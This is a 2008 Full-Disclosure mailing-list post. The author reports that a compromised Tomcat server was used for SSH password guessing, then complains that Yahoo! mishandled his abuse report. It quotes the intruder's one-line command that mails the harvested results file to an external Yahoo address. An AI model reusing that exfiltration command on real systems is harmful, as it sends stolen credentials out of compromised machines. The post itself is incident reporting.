Message-ID: <47A992D7.1070503@syn-ack.org>
Date: Wed, 06 Feb 2008 11:58:31 +0100
From: Vincent van Scherpenseel <mailinglists@...-ack.org>
To: full-disclosure@...ts.grok.org.uk
Subject: What makes Yahoo! a good merger candidate?

Their abuse policy of course!

Last week a client's server was being attacked (some old Tomcat5 vuln) 
and used to attack other servers (ssh login guessing). The results of 
these dictionary attacks were being mailed to the address 
'blax2004us@...oo.com':
cat vuln.txt |mail -s "Lame Gang Us Roots" blax2004us@...oo.com

After I addressed the vulnerability I decided to contact yahoo.com about 
this issue. Of course the only way to do this was by browsing the 
Yahoo.com site for any abuse/security contacts. After a while I found a 
form I could use to notify them of abuse of their services. So I wrote 
them a quick explanation about what was going on including the e-mail 
address of the account used to harvest passwords.

After a couple of hours I received an e-mail from 'Marcus', a Yahoo! 
Customer Care representative (44592956), asking me to provide the full 
subject and other headers from the spam I had received.

After writing back kindly that I had no spam complaint but wanted to 
report the misuse of an account of theirs, I received another reply a 
little while later asking me to provide my *personal* information about 
my account and what errors I got when I tried to log in. Well, I don't 
even *have* a Yahoo! account.

So, what do you do when you want to report something like this? In fact 
I'm doing them a favor by reporting but all I got is this lousy 
response. I'll have to think twice about reporting something like this 
next time...

Does anyone know a Yahoo! security contact who actually does his job?

Kind Regards,
Vincent van Scherpenseel

-- 
ServerFloor.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/